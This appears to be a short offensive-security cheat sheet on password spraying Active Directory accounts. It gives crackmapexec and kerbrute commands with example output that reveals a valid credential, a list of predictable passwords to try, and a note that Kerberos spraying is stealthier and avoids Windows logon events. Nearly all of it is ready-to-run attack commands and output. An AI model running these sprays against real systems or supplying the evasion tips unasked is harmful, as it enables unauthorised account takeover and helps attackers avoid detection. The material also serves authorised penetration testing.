PASSWORD SPRAYING
Spray with crackmapexec
One password, all users — Check lockout policy first
crackmapexec smb <DC_IP> -u users.txt -p 'Password1' --continue-on-success
Example Output
crackmapexec smb 10.10.10.5 -u users.txt -p 'Winter2025'
SMB 10.10.10.5 445 DC01 [-] corp\administrator:Winter2025
SMB 10.10.10.5 445 DC01 [-] corp\john.smith:Winter2025
SMB 10.10.10.5 445 DC01 [+] corp\jane.doe:Winter2025
(FOUND VALID CREDS)
Spray with kerbrute
Kerberos-based spray — Stealthier than SMB
kerbrute passwordspray -d <domain> users.txt 'Password1' --dc <DC_IP>
Example Output
kerbrute passwordspray -d corp.local users.txt 'Winter2025' --dc 10.10.10.5
[+] VALID LOGIN: jane.doe@corp.local:Winter2025
(Kerberos-based, doesn't generate Windows logon events)
Common passwords to try
Predictable patterns — Match complexity requirements
Password1, Welcome1, <Season><Year> (Winter2025), <Company>1, Password123, Changeme1
Example Output
Password1 <- most common
Welcome1 <- second most common
Winter2025 <- current season + year
Corp2025! <- company name + year
Changeme1 <- default reset password
(Match password policy: 7+ chars, uppercase, number)